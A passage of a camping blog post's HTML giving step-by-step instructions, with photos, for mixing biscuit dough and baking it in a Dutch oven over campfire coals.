You need some good coals to cook on, and it may take from 45 minutes to an hour for your fire to burn down properly.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/01-27/" rel="attachment wp-att-3328"><img data-attachment-id="3328" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/01-27/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532250609&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.003125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="01" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=497" class="aligncenter size-large wp-image-3328" src="https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/01.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Once your fire is built, set your Dutch oven next to the fire in order to pre-heat it.  Turn the Dutch oven occasionally to heat it evenly.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/02-26/" rel="attachment wp-att-3329"><img data-attachment-id="3329" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/02-26/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532250672&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.003125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="02" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=497" class="aligncenter size-large wp-image-3329" src="https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/02.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>When the fire has burned down pretty good, it is time to mix up your biscuit dough.  This recipe is for a small batch that will feed two or three people.  Start by placing two cups of self-rising flour in your mixing bowl.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/03-28/" rel="attachment wp-att-3330"><img data-attachment-id="3330" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/03-28/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532251334&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.003125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="03" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=497" class="aligncenter size-large wp-image-3330" src="https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/03.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/04-23/" rel="attachment wp-att-3331"><img data-attachment-id="3331" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/04-23/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532255867&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.00625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="04" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=497" class="aligncenter size-large wp-image-3331" src="https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/04.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Add one teaspoon of salt and mix it into the flour.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/05-23/" rel="attachment wp-att-3332"><img data-attachment-id="3332" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/05-23/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532255953&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="05" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=497" class="aligncenter size-large wp-image-3332" src="https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/05.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/06-23/" rel="attachment wp-att-3333"><img data-attachment-id="3333" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/06-23/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532255987&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="06" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=497" class="aligncenter size-large wp-image-3333" src="https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/06.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Next add ½ cup of shortening or lard (for a better biscuit use half butter and half shortening).<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/07-22/" rel="attachment wp-att-3334"><img data-attachment-id="3334" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/07-22/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256090&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="07" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=497" class="aligncenter size-large wp-image-3334" src="https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/07.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Use your fork to cut the shortening into the flour. <a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/008-16/" rel="attachment wp-att-3335"><img data-attachment-id="3335" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/008-16/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256174&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.00625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="008" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=497" class="aligncenter size-large wp-image-3335" src="https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/008.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Mash and mix until the shortening is evenly distributed and the flour looks like coarse sand.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/09-20/" rel="attachment wp-att-3336"><img data-attachment-id="3336" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/09-20/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256336&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.004&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="09" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=497" class="aligncenter size-large wp-image-3336" src="https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/09.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Now you can start adding water (or milk or buttermilk for a tastier biscuit).  Add the water a little at a time, mixing as you go.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/10-17/" rel="attachment wp-att-3337"><img data-attachment-id="3337" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/10-17/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256392&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.00625&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="10" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=497" class="aligncenter size-large wp-image-3337" src="https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/10.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Keep adding water until you have a dough that doesn’t stick to the mixing bowl or your hands.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/11-16/" rel="attachment wp-att-3338"><img data-attachment-id="3338" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/11-16/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256503&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.005&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="11" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=497" class="aligncenter size-large wp-image-3338" src="https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/11.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Let the dough rest for a few minutes while you grease your biscuit pan with shortening.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/12-15/" rel="attachment wp-att-3339"><img data-attachment-id="3339" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/12-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256797&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.005&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="12" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=497" class="aligncenter size-large wp-image-3339" src="https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/12.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>For quick and easy camp biscuits I like to tear off chunks of the dough, press them into a ¾ inch thick disk with my fingers, and place them in the biscuit pan.  If you’re cooking in the kitchen, you can roll the dough out on a floured cutting board and cut the biscuits out with a biscuit cutter.  They don’t taste any different.  They just look prettier.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/13-16/" rel="attachment wp-att-3340"><img data-attachment-id="3340" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/13-16/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532256968&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.005&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="13" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=497" class="aligncenter size-large wp-image-3340" src="https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/13.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Now turn to your fire and shovel out a bed of coals to set your Dutch oven on.<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/14-15/" rel="attachment wp-att-3341"><img data-attachment-id="3341" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/14-15/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg" data-orig-size="2592,1944" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257132&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="14" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=497" class="aligncenter size-large wp-image-3341" src="https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=497&#038;h=373" alt="" width="497" height="373" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=497&amp;h=373 497w, https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=994&amp;h=746 994w, https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=150&amp;h=113 150w, https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=300&amp;h=225 300w, https://sensiblesurvival.files.wordpress.com/2018/07/14.jpg?w=768&amp;h=576 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/15-14/" rel="attachment wp-att-3342"><img data-attachment-id="3342" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/15-14/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257170&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="15" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=497" class="aligncenter size-large wp-image-3342" src="https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/15.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p>Put your three lug nuts in the bottom of the Dutch oven,<a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/16-12/" rel="attachment wp-att-3343"><img data-attachment-id="3343" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/16-12/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257210&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="16" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=300" data-large-file="https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=497" class="aligncenter size-large wp-image-3343" src="https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=497&#038;h=371" alt="" width="497" height="371" srcset="https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=497&amp;h=371 497w, https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=994&amp;h=742 994w, https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=150&amp;h=112 150w, https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=300&amp;h=224 300w, https://sensiblesurvival.files.wordpress.com/2018/07/16.jpg?w=768&amp;h=574 768w" sizes="(max-width: 497px) 100vw, 497px" /></a></p> <p><a href="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/17-10/" rel="attachment wp-att-3344"><img data-attachment-id="3344" data-permalink="https://sensiblesurvival.org/2018/07/26/make-dutch-oven-biscuits/17-10/" data-orig-file="https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg" data-orig-size="2592,1936" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;3.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;DSC-T77&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1532257238&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;6.18&quot;,&quot;iso&quot;:&quot;100&quot;,&quot;shutter_speed&quot;:&quot;0.02&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="17" data-image-description="" data-medium-file="https://sensiblesurvival.files.wordpress.com/2018/07/17.jpg?w=300" 